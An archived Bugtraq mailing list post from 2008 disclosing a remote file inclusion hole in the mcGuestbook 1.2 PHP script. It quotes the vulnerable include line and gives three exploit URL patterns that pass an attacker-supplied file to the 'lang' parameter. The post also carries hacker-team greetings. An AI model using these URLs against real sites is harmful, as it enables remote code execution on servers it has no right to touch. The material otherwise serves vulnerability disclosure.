bugtraq June 2008 archive
Main Archive Page > Month Archives  > bugtraq archives
bugtraq: mcGuestbook 1.2 (lang) Remote File Inclusion Vulnerabil

mcGuestbook 1.2 (lang) Remote File Inclusion Vulnerability

From: Ghost hacker <ghost-r00t_at_nospam>
Date: Wed Jun 25 2008 - 17:14:08 GMT
To: <bugtraq@securityfocus.com>

hi ######################################################################  mcGuestbook 1.2 (lang) Remote File Inclusion Vulnerability ######################################################################
[~] Found : Ghost Hacker [ R-H TeaM ] |, .-. .-. ,|
[~] HOME : www.Real-Hack.net | )(_o/ \o_)( |
[~] Email : Ghost-r00t@Hotmail.com |/ /\ \|
[~] Script : mcGuestbook 1.2
[~] Download Script : http://www.phpbank.net/admin/download.php?id=155
############# [ I love the Messenger of Allah Mohammad ] #############
[~] Error ( admin.php + ecrire.php + lire.php ) :
include "$lang";

[~] Exploit :
http://xxxx/[Path]/ecrire.php?lang=[EVIL] http://xxxx/[Path]/admin.php?lang=[EVIL] http://xxxx/[Path]/lire.php?lang=[EVIL] ############# [ I love the Messenger of Allah Mohammad ] #############
[~] Gootz :

PROTO & QaTaR BoeZ TeaM & x.CJP.x & Dmar al3noOoz & 4Bo3tB .. Mr.JUVE & Mr.hope & LeGeNd HaCkEr ..
All Member Real Hack And All My Friends .. ######################################################################  Real Hack Team ( R-H ) .. ######################################################################

see y0u ..



Express yourself instantly with MSN Messenger! Download today it's FREE! http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/